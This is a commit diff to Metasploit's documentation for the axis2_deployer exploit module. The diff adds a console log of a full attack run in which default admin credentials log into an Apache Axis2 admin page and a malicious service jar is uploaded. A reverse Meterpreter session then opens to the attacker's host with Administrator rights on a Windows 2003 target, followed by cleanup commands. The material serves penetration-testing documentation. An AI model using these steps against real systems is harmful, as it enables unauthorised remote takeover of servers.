land rapid7#8154 docs for axis2_deployer

h00die · h00die · commit 09214bbb7d86 · 2017-03-27T20:47:22.000-04:00
diff --git a/documentation/modules/exploit/multi/http/axis2_deployer.md b/documentation/modules/exploit/multi/http/axis2_deployer.md
@@ -29,30 +29,34 @@ msf exploit(axis2_deployer) > set USERNAME admin
 USERNAME => admin
 msf exploit(axis2_deployer) > set PASSWORD admin123
 PASSWORD => admin123
-msf exploit(axis2_deployer) > show options
+msf exploit(axis2_deployer) > exploit
 
-Module options (exploit/multi/http/axis2_deployer):
+[*] Started reverse TCP handler on 10.10.155.39:4444 
+[+] http://10.10.155.37:8080/axis2/axis2-admin [Apache-Coyote/1.1] [Axis2 Web Admin Module] successful login 'admin' : 'axis2'
+[*] Successfully uploaded
+[*] Polling to see if the service is ready
+[*] Sending stage (30355 bytes) to 10.10.155.37
+[*] Meterpreter session 3 opened (10.10.155.39:4444 -> 10.10.155.37:1750) at 2017-03-26 23:33:19 -0500
 
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   PASSWORD  admin123         no        The password for the specified username
-   PATH      /axis2           yes       The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects)
-   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOST     10.10.155.37     yes       The target address
-   RPORT     8080             yes       The target port
-   SSL       false            no        Negotiate SSL/TLS for outgoing connections
-   USERNAME  admin            no        The username to authenticate as
-   VHOST                      no        HTTP server virtual host
+[*] NOTE: You will need to delete the web service that was uploaded.
 
+[*] Using meterpreter:
+[*] rm "webapps/axis2/WEB-INF/services/mdLFvgMv.jar"
 
-Exploit target:
+[*] Using the shell:
+[*] cd  "webapps/axis2/WEB-INF/services"
+[*] del mdLFvgMv.jar
 
-   Id  Name
-   --  ----
-   0   Java
 
-msf exploit(axis2_deployer) > exploit
+meterpreter > getuid
+Server username: Administrator
+meterpreter > sysinfo
+Computer    : juan-6ed9db6ca8
+OS          : Windows 2003 5.2 (x86)
+Meterpreter : java/java
+meterpreter > exit
+[*] Shutting down Meterpreter...
 
-[*] Started reverse TCP handler on 10.10.155.39:4444 
+[*] 10.10.155.37 - Meterpreter session 3 closed.  Reason: User exit
 
 ```
